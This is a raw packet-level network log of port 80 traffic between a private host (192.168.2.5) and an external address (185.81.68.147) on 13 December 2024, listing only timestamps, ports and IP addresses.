Dec 13, 2024 01:37:35.973182917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973196030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973215103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973231077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973252058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973267078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973289013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.982167006 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.982177973 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.982381105 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.982686043 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.982733965 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.982743979 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.982752085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983545065 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983577967 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983596087 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983606100 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983634949 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983647108 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983658075 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983668089 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983676910 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983685970 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983692884 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983762026 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983772993 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983781099 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983788967 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983798981 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983807087 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983815908 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983824968 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.983869076 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.984607935 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.986905098 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.986957073 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.986965895 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.986974955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987183094 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987194061 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987215042 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987224102 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987236023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987246037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987296104 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987309933 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987339973 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987349033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.987379074 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991022110 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991086006 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991090059 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991162062 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991170883 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991178989 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991197109 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991225004 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991240978 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991250992 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991265059 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991290092 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991298914 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991309881 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991328955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991339922 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991353035 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991362095 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991365910 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991468906 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991478920 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991487026 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991491079 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991498947 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991503000 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991512060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991520882 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991839886 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991859913 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991874933 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991894960 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991904974 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991935015 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991942883 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991961002 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991971016 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.991997957 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992007017 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992034912 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992043972 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992077112 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992085934 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992114067 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992122889 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992130995 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992146015 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992155075 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992270947 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992280960 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992290020 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992294073 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.992297888 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994391918 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994438887 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994519949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994519949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994541883 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994553089 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994569063 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994577885 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994586945 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994592905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994592905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994592905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994592905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994605064 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994615078 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994627953 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994631052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994642019 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994666100 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994667053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994676113 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994693041 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994699955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994702101 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994716883 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994731903 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994745970 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994745970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994745970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994745970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994755030 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994776964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994801998 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994810104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994812965 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994822979 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994827986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994832039 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994841099 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994849920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994852066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994863033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994870901 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994873047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994899035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994904041 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994914055 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994920969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994925022 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994939089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994940042 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994959116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994962931 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994972944 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994976997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.994983912 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.994993925 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995002985 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995004892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995013952 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995022058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995023012 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995033979 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995043039 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995043039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995054007 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995062113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995063066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995073080 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995080948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995105982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995127916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995148897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995181084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995199919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995218992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995238066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995275021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995275021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995300055 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995300055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995333910 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995342970 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995352030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995352983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995368004 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995373011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.995383978 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995393038 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995413065 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995429039 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995445013 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995477915 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995486975 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995493889 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995516062 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995534897 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995543003 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995558023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995567083 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995575905 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995587111 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995595932 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995661974 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995671034 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995677948 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995690107 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995697975 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.995707035 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997792006 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997802973 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997847080 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997855902 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997864008 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997895956 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997905016 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997919083 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997926950 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997936010 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997971058 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997984886 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.997997046 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998006105 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998025894 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998034954 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998044014 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998064041 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998073101 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998187065 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998195887 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998204947 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998217106 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998229027 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998239040 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998248100 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998256922 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998265028 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998274088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998284101 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998292923 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998303890 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998312950 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998322964 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998625994 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998640060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998656988 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998667955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998708963 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998718977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998774052 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998783112 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998795986 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998805046 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998814106 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998832941 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998842001 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998887062 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998895884 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998903990 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.998914003 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.000875950 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.000895977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.000920057 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.000929117 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.000968933 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.000977993 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001008987 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001018047 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001065016 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001072884 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001110077 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001120090 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001126051 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001157045 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001164913 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001171112 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001225948 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001234055 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001245022 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001260042 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001281023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001287937 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001379013 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001386881 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001394033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001400948 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001409054 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001418114 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001425982 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001434088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001442909 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001450062 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001461983 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001475096 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001482964 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001491070 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001497030 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001504898 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001513004 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001518965 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001526117 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001533031 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001786947 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001864910 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001877069 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001884937 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001921892 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001929998 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001938105 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001987934 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.001996994 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002053976 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002068996 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002077103 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002083063 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002089977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002101898 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002116919 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002125978 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002132893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002140045 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002146959 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002211094 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002218962 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.002226114 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.003931999 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.003963947 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.003998995 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004045963 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004055023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004084110 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004136086 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004177094 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004195929 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004209995 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004334927 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004343033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004348993 CET	80	49775	185.81.68.147	192.168.2.5
